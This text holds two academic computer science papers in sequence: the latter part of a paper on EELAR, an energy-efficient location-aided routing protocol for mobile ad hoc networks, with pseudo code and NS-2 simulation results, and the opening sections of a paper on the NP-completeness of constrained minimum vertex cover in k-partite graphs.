Area ID   Range of angle θ
1         0 ≤ θ < π/3
2         π/3 ≤ θ < 2π/3
3         2π/3 ≤ θ < π
4         π ≤ θ < 4π/3
5         4π/3 ≤ θ < 5π/3
6         5π/3 ≤ θ < 2π
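Since each area in Table I spans exactly π/3 radians, the mapping from θ to area ID reduces to an integer division (a trivial sketch; the function name is ours):

```python
import math

def area_id(theta):
    """Map an angle of arrival theta (radians, 0 <= theta < 2*pi)
    to the EELAR area ID 1..6 per Table I: each area spans pi/3."""
    return int(theta // (math.pi / 3)) + 1
```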
Fig. 3 shows the pseudo code of EELAR. As Fig. 3 shows, the algorithm is multithreaded. First, it creates a thread that executes BuildUpdatePositionTable, which builds and updates the PT in the BS. Then, EELAR executes an infinite loop. In this loop, whenever a new mobile node enters the network area of the BS, the BuildUpdatePositionTable procedure is called so that the new mobile node reports its position to the BS and its position is included in the PT. When a source mobile node S wants to send data packets to a destination mobile node D, EELAR creates a new thread that executes the DataTransmission procedure. Multiple pairs of mobile nodes can communicate in parallel using parallel threads.
Fig. 4 shows the pseudo code of the BuildUpdatePositionTable procedure. As Fig. 4 shows, the procedure starts by handling the case in which a mobile node A enters the network range of the BS. A uses its location estimation method to determine its (x, y) position and then sends a broadcast message (PosReq), a request to join the network of the BS, that contains the location of A. When the BS receives this message, it updates its PT: it determines A's angle θ and the distance d between A and the BS, and classifies A as belonging to one of the six network areas. The BS then replies to A with an ID Reply message (IDRp) containing the area ID of A, so A knows its area ID. BuildUpdatePositionTable then continues: the BS periodically broadcasts BEACON packets to all MNs in the network in order to build a PT that contains the network area ID of each MN residing within the transmission range of the BS. This exchange is repeated between the BS and all MNs periodically as long as the mobile nodes are still in the network. When a mobile node stops sending the broadcast packet (PosReq), it is marked unreachable by the BS after a timer T expires.
Fig. 5 shows the pseudo code of the DataTransmission procedure, which is called by EELAR when a source mobile node S sends data packets to a destination mobile node D. As Fig. 5 shows, S first requests the BS to initiate a route discovery to node D by sending a DstPosReq (destination position request) packet to the BS that requests the position information of D. The BS checks whether the position of D in the PT is out of date; if so, the BS sends a small BEACON message to node D requesting its new location information, to avoid out-of-date location information, and updates its PT. The BS then searches its position table for the area ID of D. When the BS determines the area ID of D, it sends a DstIDRp (Destination ID Reply) packet back to S containing the network area ID of D. If the BS determines that S and D are not in the same area, the BS sends a control packet to S indicating that the data flow will go through the BS; each data packet from S to D will then carry a "toBS" flag in its header, forcing all nodes in S's area to drop these packets and not handle them. The BS then forwards data packets from node S only to the area where D belongs. When the source node S wants to transmit data to node D and the BS has determined that S and D are in the same network area, the BS replies with a packet indicating that the data flow will take place within the network area of node S and not through the BS. This frees the BS from being involved in the communication between S and D, so the BS does not become a performance bottleneck. Node S then floods its own area with data packets directed to D. If a node B (in the same area as node S) receives a data packet directed to D and originating from S (B may receive this packet from any node in the same area as S), it measures the distance between itself and D and compares it with the distance between S and D. If B's distance is less than S's distance, B forwards the packet; otherwise, it drops it.
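The in-area forwarding rule above can be sketched as follows (an illustrative sketch with Euclidean distances; the function and parameter names are ours):

```python
import math

def should_forward(b_pos, s_pos, d_pos):
    """Node B forwards a packet from S toward D only if B is strictly
    closer to D than S is; otherwise B drops it."""
    def dist(p, q):
        return math.hypot(p[0] - q[0], p[1] - q[1])
    return dist(b_pos, d_pos) < dist(s_pos, d_pos)
```

Each hop thus makes strictly positive progress toward D, which is what bounds the flooding inside the area.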
algorithm EELAR ( ) {
    Thread (BuildUpdatePositionTable);  // create a thread that executes
                                        // the BuildUpdatePositionTable procedure
    while (1) {
        if (a mobile node enters the network area of the base station)
            Thread (BuildUpdatePositionTable);
        if (a source mobile node wants to send data to a destination mobile node)
            Thread (DataTransmission);  // create a thread that executes
                                        // the DataTransmission procedure
    } // end while
} // end EELAR
Figure 3. EELAR pseudo code
procedure BuildUpdatePositionTable ( )  // build and update position table in BS
Input: mobile node A; base station X;
{
    Control packet PosReq;  // position request message containing x, y coordinates
    if (node A enters the network area controlled by X) {
        A sends PosReq to X;
        X: addPositionTable (A, x, y);
        X: sends IDRp to A containing area ID of A;
    } // end if
    repeat every time T
        X sends BEACON message to A;
        A sends PosReq to X;
        X: UpdatePositionTable (A, x, y);
    until valid timer expires
    X marks node A unreachable
} // end BuildUpdatePositionTable
Figure 4. BuildUpdatePositionTable pseudo code
procedure DataTransmission ( )  // a source mobile node S sends data
                                // to a destination mobile node D
Input: source node S; destination node D; base station X;
{
    // S initiates data transmission to D
    // S requests X to initiate route discovery
    S sends DstPosReq to X;
    X checks PT for position of D;
    if (position of D in PT is out of date) {
        X sends BEACON message to D;
        D sends PosReq to X;
        X: UpdatePositionTable (D, x, y);
    } // end if
    X searches PT for position of D;
    X sends DstIDRp to S;  // message contains area ID of D
    if (isNotInTheSameArea (S, D)) {
        S sets toBS flag in header of all packets to D;
        // nodes in the same area as S will drop the packet
        S sends data to X;
        X routes data to D;  // BS floods message to area of D
    } // end if
    else {
        // S floods message to its own area
        S sends data to same-area nodes;
        for each node B in S's area {
            if (distance (B, D) < distance (S, D))
                B forwards this packet;
            else
                B drops this packet;
        } // end for
    } // end else
} // end procedure
Figure 5. DataTransmission pseudo code
The benefit of the DataTransmission procedure is that the amount of data that can be transmitted and received at a time t can exceed the available bandwidth of the BS, because the BS is not involved in data transmission between nodes that are in the same area.
IV. EXPERIMENTAL RESULTS
In order to validate the proposed protocol and show its efficiency, we present simulations using network simulator version 2 (NS-2). NS-2 is a very popular network simulation tool. It uses C++ for protocol definition and Tcl scripting for building simulation scenarios [21]. The simulation environment settings used in the experiments are shown in Table II. The simulation duration is 500 seconds and the network area is 1500 m x 1500 m, with a variable number of mobile nodes ranging from 50 to 250. Constant Bit Rate (CBR) traffic is generated as the data traffic pattern at a rate of 2 packets per second, and 20% of the mobile nodes are selected randomly as CBR sources. The node mobility scenario is generated randomly based on the random waypoint model [20], in which a mobile node moves to a new position, pauses there for a period between 0 and 3 seconds, and then moves to another position.
TABLE II. NS-2 SIMULATION ENVIRONMENT SETTINGS
Parameter Setting Value
Simulation duration 500 sec
Network area 1500 m x 1500 m
Number of mobile nodes 50,100,150,200,250
Mobility model Random way point model
Pause time 0 to 3 sec
Node transmission range 250 m
Data packet size 512 bytes
Number of CBR sources 20% of MNs
CBR rate 2 packets per second
Mobile node speed 5 to 30 m/s
We compare the performance of EELAR with AODV, LAR, and DSR, which are well-known routing protocols in MANETs. The measured performance metrics are control overhead and data packet delivery ratio. The control overhead is the number of control packets divided by the number of delivered data packets in the network, and the data packet delivery ratio is the number of received data packets divided by the total number of sent data packets.
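The two metrics can be written down directly (a trivial sketch; the function names are ours, not from the paper):

```python
def control_overhead(control_pkts, delivered_data_pkts):
    """Control overhead: control packets per delivered data packet."""
    return control_pkts / delivered_data_pkts

def delivery_ratio(received_data_pkts, sent_data_pkts):
    """Fraction of sent data packets that were actually received."""
    return received_data_pkts / sent_data_pkts
```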
In the first experiment we measure the control overhead of the four protocols as a function of the average speed of the mobile nodes. The number of MNs in the network was set to 100 and the average speed of the MNs was varied from 5 to 30 m/s. The result is shown in Fig. 6. As the figure shows, for all compared protocols the overhead increases slightly as the average speed of the MNs increases. In addition, the EELAR protocol has the smallest control overhead among the four compared protocols; LAR has the second smallest, AODV the third smallest, and DSR the worst. The justification for the small control overhead in EELAR compared to the other protocols is that the control packets used in discovering a new route are limited to a smaller zone.
Figure 6. Control overhead versus average speed
In the second experiment we measure the data packet delivery ratio of the four compared protocols as a function of the average speed of the mobile nodes. The number of MNs in the network was set to 100 and the average speed of the MNs was varied from 5 to 30 m/s. The result is shown in Fig. 7. As the figure shows, for all compared protocols the data delivery ratio decreases slightly as the average speed of the MNs increases. In addition, the EELAR protocol has the highest data packet delivery ratio among the four compared protocols; LAR has the second highest, AODV the third highest, and DSR the worst. An explanation for the good delivery ratio in EELAR is that since the control overhead is smaller (as shown in the first experiment), the battery life of the mobile nodes is longer, and hence routes are maintained for a longer time. One reason for the loss of data packets is the loss of routes due to power shortage.
In the third experiment we measure the control overhead of the four protocols as a function of the number of mobile nodes. The average speed of the MNs was set to 15 m/s and the number of mobile nodes in the network was varied from 50 to 250. The result is shown in Fig. 8. The simulation results show that for all compared protocols the control overhead increases slightly as the node density of the network increases. In addition, the EELAR protocol has the smallest control overhead among the four compared protocols; LAR has the second smallest, AODV the third smallest, and DSR the worst. The justification for the improvement in control overhead in EELAR compared to the other three protocols is the same as in the first experiment.
In the fourth experiment we measure the data packet delivery ratio of the four protocols as a function of the number of mobile nodes. The average speed of the MNs was set to 15 m/s and the number of mobile nodes in the network was varied from 50 to 250. The result is shown in Fig. 9. As the figure shows, for LAR, AODV, and DSR the data delivery ratio increases very slightly, while for EELAR it remains the same as the number of MNs increases. In addition, the EELAR protocol has the highest data packet delivery ratio among the four compared protocols; its delivery ratio never drops below 95%. LAR has the second highest delivery ratio, AODV the third highest, and DSR the worst. The justification for the improvement in delivery ratio in EELAR compared to the other three protocols is the same as in the third experiment.
Figure 7. Data packets delivery ratio versus average speed
Figure 8. Control overhead versus number of MNs in the network
Figure 9. Data packets delivery ratio versus number of MNs in the network
In the last experiment we determine the optimal number of network areas into which the network should be divided, i.e., the number that produces the smallest control overhead. We therefore study the effect of varying the number of network areas on the control overhead in EELAR. Fig. 10 shows the result. In this experiment the number of network areas was varied from 1 to 20, the number of mobile nodes was set to 250, and the average speed was set to 15 m/s. As the figure shows, the control overhead keeps decreasing as the number of network areas increases until this number reaches 6; the control overhead then starts increasing as the number of network areas keeps growing. This is explained as follows. For the decreasing part: the idea of EELAR is to significantly reduce control overhead by limiting the area of discovering a new route to a smaller zone, so control overhead is reduced as the number of areas increases. For the increasing part: increasing the number of areas increases route loss. With a very large number of areas, and due to node mobility, there is a higher probability that a node leaves its original area and enters a new area very quickly during a short period of time. Hence, with a larger number of areas, when a source node initiates a transmission to a destination node, the probability of losing routes during the transmission period is higher than with a smaller number of areas. This leads to increased control overhead, which becomes worse as the number of areas keeps increasing.

Thus, our approach of dividing the network area into six sub-areas is not the optimal solution in all cases. There is a tradeoff between decreasing control overhead and increasing route loss as the number of network areas grows due to node mobility. This suggests that the optimal number of network areas depends on node mobility.
Figure 10. Control overhead in EELAR versus number of network areas
V. CONCLUSION
This paper proposed an Energy Efficient Location Aided Routing (EELAR) protocol that is an optimization of Location Aided Routing (LAR). EELAR significantly reduces the energy consumption of the mobile nodes' batteries by limiting the area of discovering a new route to a smaller zone. Thus, control packet overhead is significantly reduced and the lifetime of the mobile nodes is increased. To show the efficiency of the proposed protocol we presented simulations using NS-2. The simulation results show that our proposed EELAR protocol improves control overhead and delivery ratio compared to the AODV, LAR, and DSR protocols.

In addition, the simulation results show that there is a tradeoff between decreasing control overhead and increasing route loss as the number of network areas grows due to node mobility. This suggests that the optimal number of network areas depends on node mobility.

Suggestions for future work include developing a method to adaptively choose one of the forwarding methods of the position-based routing protocol based on the surrounding environment, and dividing the network into a number of areas that varies dynamically based on the node mobility pattern.
ACKNOWLEDGMENT
The author wishes to acknowledge Mohamed B.AbuBaker, Shaaban A. Sahmoud and Mahmoud Alhabbashfrom the computer engineering department at IUG for their work, useful feedback, and comments during the preparation
of this paper.
REFERENCES
[1] T. Camp, J. Boleng, B. Williams, L. Wilcox, and W. Navidi, "Performance comparison of two location-based routing protocols for ad hoc networks," in Proc. IEEE INFOCOM, 2002, pp. 1678-1687.
[2] W. Zhao and M. H. Ammar, "Message ferrying: proactive routing in highly-partitioned wireless ad hoc networks," in Proc. IEEE Workshop on Future Trends of Distributed Computing Systems (FTDCS 2003), 2003.
[3] N. Aslam, W. Robertson, S. C. Sivakumar, and W. Phillips, "Energy efficient cluster formation using multi criterion optimization for wireless sensor networks," in Proc. 4th IEEE Consumer Communications and Networking Conference (CCNC), 2007.
[4] N. Aslam, W. Phillips, W. Robertson, and S. Sivakumar, "Extending network life by using mobile actors in cluster-based wireless sensor and actor networks," in Proc. Wireless Sensor and Actor Networks (WSAN 08), Ottawa, ON, 2008.
[5] J. Broch, D. B. Johnson, and D. A. Maltz, "The dynamic source routing protocol for mobile ad hoc networks," draft-ietf-manet-dsr-03.txt, Internet Draft, Oct. 1999.
[6] B. Karp and H. T. Kung, "GPSR: Greedy perimeter stateless routing for wireless networks," in Proc. IEEE/ACM MOBICOM, Boston, MA, Aug. 2000, pp. 243-254.
[7] J. Li, J. Jannotti, D. S. J. De Couto, D. R. Karger, and R. Morris, "A scalable location service for geographic ad hoc routing," in Proc. 6th Annual IEEE/ACM MOBICOM, Boston, MA, Aug. 2000, p. 120.
[8] W. Kieß, H. Füßler, and J. Widmer, "Hierarchical location service for mobile ad hoc networks," ACM SIGMOBILE Mobile Computing and Communications Review, vol. 8, no. 4, pp. 47-58, Oct. 2004.
[9] C. E. Perkins and P. Bhagwat, "Highly dynamic Destination-Sequenced Distance-Vector routing (DSDV) for mobile computers," Computer Communication Review, pp. 234-244, Oct. 1994.
[10] K. Akkaya and M. Younis, "A survey on routing protocols for wireless sensor networks," Ad Hoc Networks, 3(3), pp. 325-349, May 2005.
[11] C. Yu, B. Lee, and H. Youn, "Energy efficient routing protocols for mobile ad hoc networks," Wireless Communications and Mobile Computing, vol. 3, no. 8, pp. 959-973, 2003.
[12] A. Quintero, D. Li, and H. Castro, "A location routing protocol based on smart antennas for ad hoc networks," Journal of Network and Computer Applications, Elsevier, vol. 30, pp. 614-636, 2007.
[13] D. Niculescu and B. Nath, "Ad hoc Positioning System (APS) using AOA," in Proc. IEEE INFOCOM, 2003.
[14] Z. Haas and M. Pearlman, "The performance of query control schemes for the zone routing protocol," in Proc. ACM SIGCOMM, Aug. 1998.
[15] H. C. Liao and C. J. Lin, "A WiMAX-based connectionless approach for high mobility MANET," in Proc. 9th International Conference on Advanced Communication Technology (ICACT 2007), Phoenix Park, Korea, Feb. 2007.
[16] H. C. Liao and C. J. Lin, "A position-based connectionless routing algorithm for MANET and WiMAX under high mobility and various node densities," Information Technology Journal, 7(3), pp. 458-465, 2008.
[17] D. Johnson, D. Maltz, and Y. Hu, "The dynamic source routing protocol," IETF Internet draft, Jul. 2004.
[18] Y. Zhao, L. Xu, and M. Shi, "On-Demand Multicast Routing Protocol with Multipoint Relay (ODMRP-MPR) in mobile ad-hoc network," in Proc. ICCT 2003, 2003, pp. 1295-1300.
[19] Y. B. Ko and N. H. Vaidya, "Location-Aided Routing (LAR) in mobile ad hoc networks," in Proc. 4th Annual ACM/IEEE International Conference on Mobile Computing and Networking, 1998.
[20] W. Navidi and T. Camp, "Stationary distributions for the random waypoint mobility model," IEEE Transactions on Mobile Computing, 3(1), 2004.
[21] "The Network Simulator ns-2," Information Sciences Institute, USC Viterbi School of Engineering, Sep. 2004. Available: http://www.isi.edu/nsnam/ns/
[22] C. Perkins, E. Belding-Royer, and S. Das, "Ad hoc On-demand Distance Vector (AODV) routing," University of Cincinnati, Internet draft, July 2003.
[23] H. Okada, A. Takano, and K. Mase, "Analysis and proposal of position-based routing protocols for vehicular ad hoc networks," IEICE Transactions, 91-A(7), pp. 1634-1641, 2008.
AUTHORS PROFILE
Mohammad A. Mikki is an Associate Professor of Parallel and Distributed Computing in the Electrical and Computer Engineering Department at IUG, with about fifteen years of research, teaching, and consulting experience in various computer engineering disciplines. Dr. Mikki was the first chairman of the ECE department at IUG in the academic year 1995-1996. He has taught both graduate and undergraduate courses at the ECE department at IUG. In addition, he has taught several undergraduate courses at the College of Science and Technology, the College of Education (currently Al-Aqsa University), and Al-Quds Open University. He was a visiting professor at the Department of Electrical and Computer Engineering at the University of Arizona in Tucson, Arizona (USA) during the academic year 1999-2000. He was granted a DAAD Study Visit Scholarship to Paderborn University in Paderborn, Germany, from July 2002 to August 2002 by DAAD (the German Academic Exchange Service). Dr. Mikki has published about twenty papers in journals and international conferences.

Dr. Mikki received his Ph.D. and Master of Science in Computer Engineering from the Department of Electrical and Computer Engineering at Syracuse University in Syracuse, New York, USA, in December 1994 and May 1989 respectively. He received his Bachelor of Science in Electrical Engineering from the Department of Electrical Engineering at BirZeit University in BirZeit, West Bank, in August 1984.

Dr. Mikki held a graduate research assistantship from NPAC (North East Parallel Architecture Center) at Syracuse University during 1989-1990, and a research assistantship from the Department of Electrical and Computer Engineering at Syracuse University during 1990-1994. He also received Deanery of Scientific Research grants from IUG during the academic years 01/02, 03/04, and 07/08. Dr. Mikki was a software consultant and programmer at Vertechs Software Solutions Inc. in Syracuse, New York (USA) from 1991 to 1994, and a software consultant at Computer Software Modeling and Analysis in Fayetteville, New York (USA) from January 1993 to March 1993.

Dr. Mikki received two funded projects from the European Union (EU): the Mediterranean Virtual University (MVU) project from 2004 to 2006 and the Open Distance Inter-university Synergies between Europe, Africa and Middle East (ODISEAME) project from 2002 to 2005.

Dr. Mikki's research interests include high performance parallel and distributed computing, grid and cluster computing, wireless and mobile networks, modeling and design of digital computer systems, Internet technology and programming, Internet performance measurement tools, and web-based learning.
Constraint Minimum Vertex Cover in K-Partite Graph: Approximation Algorithm and Complexity Analysis
Kamanashis Biswas
Computer Science and Engineering Department
Daffodil International University
102, Shukrabad, Dhaka-1207
ananda@daffodilvarsity.edu.bd

S.A.M. Harun
Right Brain Solution
Flat# B4, House# 45, Road# 27
Banani, Dhaka
harun@rightbrainsolution.com
Abstract – Generally, in a graph G, an independent set is a subset S of vertices in G such that no two vertices in S are adjacent (connected by an edge), and a vertex cover is a subset S of vertices such that each edge of G has at least one of its endpoints in S. The minimum vertex cover problem is to find a vertex cover with the smallest number of vertices. Consider a k-partite graph G = (V, E) with vertex k-partition V = P1 ∪ P2 ∪ . . . ∪ Pk and k integers kp1, kp2, . . . , kpk. We want to determine whether or not there is a minimum vertex cover in G with at most kp1 vertices in P1, kp2 vertices in P2, and so on. This study shows that the constrained minimum vertex cover problem in k-partite graphs (MIN-CVCK) is NP-Complete, which is an important property of k-partite graphs. Many combinatorial problems on general graphs are NP-Complete, but when restricted to k-partite graphs with at most k vertices, many of these problems can be solved in polynomial time. This paper also presents an approximation algorithm for MIN-CVCK and analyzes its complexity. In the future work section, we identify a number of directions that may be of interest to researchers, such as developing an algorithm for maximum matching and a polynomial algorithm for constructing a k-partite graph from a general graph.
Keywords: Bipartite graph, Clique problem, Constraint minimum vertex cover, NP-Complete, Polynomial time algorithm
I. INTRODUCTION
NP-Completeness theory is one of the most important developments of algorithm research since its introduction in the early 1970s. Its importance arises from the fact that its results have meaning for all researchers who develop computer algorithms: not only computer scientists, but also electrical engineers, operations researchers, etc. A wide variety of commonly encountered problems from mathematics, computer science, and operations research are known to be NP-Complete, and the collection of such problems is continuously growing almost every day. Indeed, NP-Complete problems are now so pervasive that it is important for anyone concerned with the computational aspects of these fields to be familiar with the meaning and implications of this concept. A number of works have already been done, and more are in progress today. For example, Jianer Chen et al. have shown that the complexity of an algorithm for solving the vertex cover problem is non-deterministic polynomial [3]. The complexity of the algorithm for constrained minimum vertex cover in bipartite graphs is also non-deterministic polynomial, as proved by Jianer Chen and Iyad A. Kanj [2]. Similarly, H. Fernau and R. Niedermeier have proposed an efficient exact algorithm for constrained bipartite vertex cover, which is also non-deterministic polynomial [4]. This paper shows that the minimum vertex cover problem in k-partite graphs is NP-Complete, provides an approximation algorithm, and analyzes its complexity, which is polynomial time.
II. PRELIMINARY
This section presents some basic terms and necessary elaborations that are important for the rest of the paper. Definitions not included in this section will be introduced as they are needed.
A. Bipartite Graph
A bipartite graph is any graph whose vertices can be divided into two sets such that there are no edges between vertices of the same set [8]. A graph can be proved bipartite if it does not contain any circuit of odd length. Equivalently, its vertex set can be decomposed into two disjoint sets such that no two vertices within the same set are adjacent. A bigraph is a special case of a k-partite graph with k = 2.
Figure 2.1: Bipartite Graph
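The odd-cycle characterization above can be checked with a standard BFS 2-coloring; this is a generic sketch, not code from the paper:

```python
from collections import deque

def is_bipartite(adj):
    """A graph is bipartite iff it contains no odd-length cycle,
    i.e., iff its vertices can be 2-colored so that every edge joins
    different colors. `adj` maps each vertex to its neighbour list."""
    color = {}
    for start in adj:
        if start in color:
            continue                      # component already colored
        color[start] = 0
        queue = deque([start])
        while queue:
            u = queue.popleft()
            for v in adj[u]:
                if v not in color:
                    color[v] = 1 - color[u]   # place v in the other set
                    queue.append(v)
                elif color[v] == color[u]:    # same-set edge => odd cycle
                    return False
    return True
```

For example, an even cycle such as C4 passes the test, while a triangle fails it.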
B. K-partite Graph
A k-partite graph is a graph whose vertex set can be decomposed into k disjoint sets such that no two vertices within the same set are adjacent. A complete k-partite graph is a k-partite graph in which every pair of vertices from different sets is adjacent [9]. If there are p, q, . . . , r vertices in the k sets, the complete k-partite graph is denoted K p,q,...,r.
ISSN 1947-5500
(a) (b)
Figure 2.2: (a) k-partite graph, (b) Complete k-partite graph
C. Vertex Cover
Let S be a collection of subsets of a finite set X. The smallest subset Y of X that meets every member of S is called the vertex cover, or hitting set. However, some authors call any such set a vertex cover, and then refer to the minimum vertex cover [6]. Finding the hitting set is an NP-Complete problem. Vertex covers, indicated with unfilled vertices, are shown in figure 2.3 for a number of graphs. In a complete k-partite graph, a vertex cover contains vertices from at least k − 1 parts.
Figure 2.3: Vertex Cover
1. Minimum Vertex Cover: As a detailed example of an NP-Complete problem, the VERTEX-COVER problem is described in Section III. Given a graph G = (V, E), is there a vertex cover, i.e., a subset of nodes that touches all edges in E and contains not more than k vertices, where k is a given constant? Posed as a language, this problem becomes:

VERTEX-COVER = {(G, k) | G has a vertex cover of at most k vertices.}

Typically, this problem can be asked in another form: instead of asking whether some vertex cover exists, the task is to find the smallest possible vertex cover. Given a graph G = (V, E), find a vertex cover of G having the smallest possible number of vertices. Optimization problems like this one are even more difficult than the related yes/no problems: VERTEX-COVER is NP-Complete, but MIN-VERTEX-COVER is NP-hard, i.e., it is not even in NP itself.
2. Approximate Vertex Cover: We know that finding the minimum vertex cover of a graph is NP-Complete. However, a very simple procedure can efficiently find a vertex cover that is at most twice as large as the optimal cover. Let us see a simple procedure [6]:

VertexCover (G = (V, E))
    While (E ≠ ∅) do:
        Select an arbitrary edge (u, v) ∈ E
        Add both u and v to the vertex cover
        Delete all edges from E that are incident on either u or v

3. Constraint Vertex Cover: The constrained vertex cover of an undirected graph G = (V, E) is a subset V' ⊆ V where the number of vertices is less than or equal to k [here k is k_p1 + k_p2 + . . . + k_pk]. That is, |V'| ≤ k. We have to decide whether there is a minimum vertex cover in G with at most k_p1 vertices in part P1, k_p2 vertices in P2, and so on.
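The 2-approximation procedure of item 2 above translates almost line-for-line into Python. The sketch below is our own rendering (the graph is given as an edge list; names are illustrative):

```python
def vertex_cover_2approx(edges):
    """Greedy 2-approximation [6]: repeatedly pick an uncovered edge
    and add both of its endpoints to the cover."""
    cover = set()
    remaining = set(edges)
    while remaining:
        u, v = next(iter(remaining))   # select an arbitrary remaining edge
        cover.update((u, v))           # add both endpoints to the cover
        # delete every edge incident on either u or v
        remaining = {(a, b) for (a, b) in remaining
                     if a not in (u, v) and b not in (u, v)}
    return cover
```

Since the edges selected in successive iterations share no endpoints, any cover must contain at least one endpoint of each, so the returned set is at most twice the optimum.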
D. Class P and NP
The class P is the set of problems that can be solved by a polynomial-time algorithm. For problems in class P, polynomial-time algorithms already exist; for example, matrix multiplication, Prim's minimum spanning tree algorithm, and graph traversal are all polynomial-time algorithms. On the other hand, the name NP stands for nondeterministic polynomial. The class NP is the set of problems that can be solved by a nondeterministic algorithm in polynomial time or, equivalently, the set of problems whose solutions can be verified by a polynomial-time algorithm [5]. No deterministic polynomial-time algorithm is known for the hardest problems of the NP class.
E. Properties of NP-Complete Problem
Let L1 and L2 be two problems. L1 reduces to L2 (also written L1 ≤p L2) if and only if there is a way to solve L1 in deterministic polynomial time using, as a subroutine, a deterministic algorithm that solves L2 in polynomial time [7]. We can now define the set of NP-Complete problems, which are the hardest problems in NP, in the following way. A problem L is NP-Complete if:

1. L ∈ NP, and
2. L1 ≤p L for some L1 ∈ NPC.

That is, more precisely, a problem is NP-Complete if and only if:

1. the problem is in NP, and
2. the problem is polynomial-time reducible from another problem that is already NP-Complete.

If a problem L satisfies property 2, but not necessarily property 1, then we say that L is NP-hard.
III. VERTEX COVER AND CLIQUE PROBLEM
The vertex cover of an undirected graph G = (V, E) is a subset V' ⊆ V such that if (u, v) ∈ E, then u ∈ V' or v ∈ V' (or both). More precisely, the vertex cover problem is the optimization problem of finding a vertex cover of minimum size in a graph, i.e., finding a minimum number of vertices that "covers" all edges. The following figure illustrates a minimum vertex cover of the graph G.
Figure 3.1: Minimum vertex cover of graph G with size |V'|
A clique in an undirected graph G = (V, E) is a subset V' ⊆ V of vertices, each pair of which is connected by an edge in E. Similar to the vertex cover problem, the clique problem is the optimization problem of finding a clique of maximum size in a graph. A practical use of the clique problem is in the synthesis and optimization of digital systems, e.g., to model certain resource allocation constraints.
Figure 3.2: Clique Problem
IV. MAIN THEOREM
It is already proved that the MIN-CVCB (constrained minimum vertex cover in bipartite graphs) problem is in NP. Jianer Chen and Iyad A. Kanj proved the theorem in "Constrained minimum vertex cover in bipartite graphs: complexity and parameterized algorithms" in 2003 [2]. G. Bai and H. Fernau show that exact algorithms can perform much better than the theoretical bounds suggest [1]. In this section, the main theorem of this research is described, which shows that vertex cover in k-partite graphs is NP-Complete.
Theorem: The minimum constrained vertex cover problem is NP-Complete in k-partite graph.
Proof: First we show that VERTEX-COVER ∈ NP. Suppose we are given a graph G = (V, E) with vertex k-partition V = P1 ∪ P2 ∪ . . . ∪ Pk and the integers k_p1, k_p2, . . ., k_pk, where k = k_p1 + k_p2 + . . . + k_pk. The certificate we choose is the vertex cover V' ⊆ V itself. The verification algorithm affirms that |V'| ≤ k, and then it checks, for each edge (u, v) ∈ E, whether u ∈ V' or v ∈ V'. This verification can be performed straightforwardly in polynomial time.
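The verification step just described can be made concrete. The following Python sketch is our own illustration (names and data layout are assumptions); it checks a claimed constrained cover in time linear in the number of edges plus vertices:

```python
def verify_cvck_certificate(edges, parts, cover, caps):
    """Polynomial-time verifier for a constrained vertex cover:
    every edge must touch the cover, and each partition p may
    contribute at most caps[p] vertices."""
    # every edge (u, v) must have an endpoint in the cover
    if any(u not in cover and v not in cover for u, v in edges):
        return False
    # count cover vertices per partition and compare with the caps
    used = {}
    for v in cover:
        used[parts[v]] = used.get(parts[v], 0) + 1
    return all(used.get(p, 0) <= caps[p] for p in caps)
```

Both passes are a single scan, so the verifier clearly runs in polynomial time, as the proof requires.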
We can prove that the vertex cover problem is NP-hard by showing that CLIQUE ≤p VERTEX-COVER. This reduction is based on the notion of the "complement" of a graph. Given a k-partite graph G = (V, E), the complement of G is defined as ~G = (V, ~E), where ~E = {(u, v) : u ≠ v and (u, v) ∉ E}. In other words, ~G is the graph containing exactly those edges that are not in G.
Figure 4.1 shows a graph and its complement and illustrates the reduction from CLIQUE to VERTEX-COVER. In the figure, each edge is "covered" by at least one vertex in V' incident on it; the vertex cover shown is V' = {z, w}, of size 2.

Figure 4.1: 3 easy reductions
The reduction algorithm takes as input an instance (G, k) of the clique problem. It computes the complement ~G, which is easily done in polynomial time. The output of the reduction algorithm is the instance (~G, |V| − k) of the vertex cover problem. To complete the proof, we show that this transformation is indeed a reduction: the k-partite graph G has a clique of size k if and only if the graph ~G has a vertex cover of size |V| − k, as shown in figure 4.1.
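The reduction itself is mechanical: complement the edge set and adjust the budget. A short Python sketch of this mapping (our own illustration; names are not from the paper):

```python
from itertools import combinations

def clique_to_vc_instance(vertices, edges, k):
    """Map a CLIQUE instance (G, k) to the VERTEX-COVER instance
    (~G, |V| - k) used in the reduction."""
    present = {frozenset(e) for e in edges}
    # edges of the complement: vertex pairs NOT joined in G
    comp_edges = [tuple(p) for p in combinations(vertices, 2)
                  if frozenset(p) not in present]
    return comp_edges, len(vertices) - k
```

The complement is built from at most |V|² vertex pairs, so the whole transformation runs in polynomial time, as the proof requires.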
Here, the above graph G is a 4-partite graph. Suppose that G has a clique V' ⊆ V with size k = |V'|. The subsets produced from the previous graph are as follows:

Figure 4.2: 4-partite graph G

Figure 4.3: Subsets of graphs produced from the 4-partite graph

[Figure labels: instance <G, k> of CLIQUE; instance <~G, |V| − k> of VERTEX-COVER; the clique of maximum size is represented by the rectangular area; V' is a clique of size k (= 5 here) in ~G; V' is an independent set of size k (= 5 here) in G; V − V' is a vertex cover of size n − k (= 4 here) in G.]
So V − V' is a vertex cover in ~G with size |V| − k. Let (a, b) be any edge in ~E; then (a, b) ∉ E, which implies that at least one of a or b does not belong to V', since every pair of vertices in V' is connected by an edge of E. Equivalently, at least one of a or b is in V − V', which means that the edge (a, b) is covered by V − V'. Since (a, b) was chosen arbitrarily from ~E, every edge of ~E is covered by a vertex in V − V'. Hence the set V − V', which has size |V| − k, forms a vertex cover for ~G.

Conversely, suppose that ~G has a vertex cover V' ⊆ V, where |V'| = |V| − k. Then for all a, b ∈ V, if (a, b) ∈ ~E then a ∈ V' or b ∈ V' or both. Contrapositively, if a ∉ V' and b ∉ V', then (a, b) ∈ E. Hence V − V' is a clique, and it has size |V| − |V'| = k.

V. APPROXIMATION ALGORITHM

At present, all known algorithms for NP-Complete problems require exponential time. It is unknown whether there are any faster algorithms. Therefore, in order to solve an NP-Complete problem for any non-trivial problem size, one of the following approaches is used, according to [6]:

• Approximation: An algorithm which quickly finds a suboptimal solution which is within a certain (known) range of the optimal one. Not all NP-Complete problems have good approximation algorithms, and for some problems finding a good approximation algorithm is enough to solve the problem itself.

• Probabilistic: An algorithm which provably yields good average runtime behavior for a given distribution of the problem instances, ideally one that assigns low probability to "hard" inputs.

• Special cases: An algorithm which is provably fast if the problem instances belong to a certain special case.

• Heuristic: An algorithm which works "reasonably well" on many cases, but for which there is no proof that it is always fast.

